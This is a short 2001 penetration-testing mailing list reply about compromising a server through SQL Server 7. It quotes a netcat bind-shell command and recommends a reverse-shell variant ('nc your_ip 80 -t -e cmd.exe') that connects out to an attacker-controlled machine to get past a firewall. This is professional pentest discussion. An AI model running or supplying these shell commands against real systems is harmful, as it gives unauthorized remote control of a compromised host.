Penetration Testing mailing list archives

Re: [PEN-TEST] Hacking a server through SQL SERVER 7


From: Frank Knobbe <FKnobbe () KNOBBEITS COM>
Date: Thu, 25 Jan 2001 17:36:15 -0600

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

-----Original Message-----
From: Brentlinger, Mike (ISS eServices) [mailto:mbrentli () ISS NET]
Sent: Thursday, January 25, 2001 1:39 PM

[...]
run netcat
   nc -l -p 999 -t -e cmd.exe
[...]

Netcat listening on port 999? That would require you to establish a
connection from the outside through the firewall. Instead, have your
own netcat on your machine listening, and use 'nc your_ip 80 -t -e
cmd.exe' to have nc establish a connection to the outside.

Regards,
Frank

-----BEGIN PGP SIGNATURE-----
Version: PGP Personal Privacy 6.5.8
Comment: PGP or S/MIME encrypted email preferred.

iQA/AwUBOnC4b5ytSsEygtEFEQI3SACfaMFFzwJmEQkIE4TbgxPQ471tykcAn0v8
9P8uTHjsqJw9215LH/xxGaWG
=oJf8
-----END PGP SIGNATURE-----


Current thread: